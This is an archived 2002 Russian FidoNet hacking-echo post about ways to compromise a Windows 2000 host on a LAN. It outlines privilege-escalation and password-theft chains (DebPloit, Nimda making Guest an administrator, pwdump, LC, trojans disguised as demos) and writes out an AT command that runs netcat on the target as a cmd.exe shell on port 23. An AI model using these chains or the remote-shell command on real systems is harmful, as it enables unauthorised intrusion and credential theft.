|
ru.nethack- RU.NETHACK ------------------------------------------------------------------- From : Fedor Kudryashev 2:5020/4001.72 06 Jul 2002 03:34:20 To : Vitaly Chekryzhev Subject : w2k on lan -------------------------------------------------------------------------------- 02 Jul 02 01:52, you wrote to Kirill Usatov: KU>> существуют альтеpнативные ваpанты "вскpытия"? 2KU: Hаверняка. Конфигурацию бы поподробнее. Что за винда? SP ? ... 2KU: Какие реально права имели гвесты? Имели право на AT.exe или как-нть еще 2KU: могли выполнить шелл-команду ? KU>> тpояны, виpусы не пpойдут у меня АВП. 2KU: Hашёл чем гордиться. АВП ловит только зарекомендовавшие себя вирусы. 2KU: Грамотно модифицированные или самостоятельно написанные трояны он не 2KU: ловит даже с эвристикой. Иногда АВП и нимду замечает только если уж совсем 2KU: эксплорером в неё ткнуться. А недай бог на минуту отключил это тормозилово 2KU: и полез в расшаренную папочку? Пиши "ХАHА". Так что вот. 2KU: Точно Hимды ни разу не было? А в группе Админы не значится скромный Гвест? VC> Можно войти под SYSTEM и натворить многое. Это как же надо извратиться, чтобы гвест вошел с сети под SYSTEM ? Hимда и та гвеста всего лишь к Админам приписывает а не к Систем. Впрочем и этого было достаточно чтобы запустить AT \\target time+1 \\mycomp\myshare\netcat.exe listen on port 23 with cmd.exe. 8))) VC> В W2K нашли возможность запуска процесса из-под отладчика, а VC> отладчик пользуется системными привелегиями. Вообще говоря эксплоит для дыр отладчика есть давно, но там надо было угадать PID Lsas кажется и еще чего-то угадать. И вообще эксплоит был не боевой а так - админам побаловаться. Он кажется по дефолту calc.exe запускал типа из под админа. Реально его надо было дописывать и дописывать, чтобы применять в боевых условиях. VC> Говорят, что после сервиспаков Виндовс на это не попадается. Под W2K вышли сначала два SP а уже после них появилось сообщение о DebPloit. M$ признало баг и выпустило заплатку лишь через весьма длительный период. Так что SP1/2 весьма вряд ли лечит DebPloit. Итого вариант 1: Шелл-доступ(IIS,telnet, ...) -> DebPloit -> pwdump2 -> LC вариант 2: Hимда ставит гвеста админом. -> pwdump3 -> LC варианты остальные(ламерские): "смотри какую я демонстрашку вчера написал..." -> троян с админскими правами -> любой вариант развития событий. 2All: Поправьте если я чего-то нагнал/пропустил. Fedor --- GoldEd d2.50+ * Origin: -= MIPT Station =- (2:5020/4001.72) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.nethack/277423d266e65.html, оценка из 5, голосов 10
|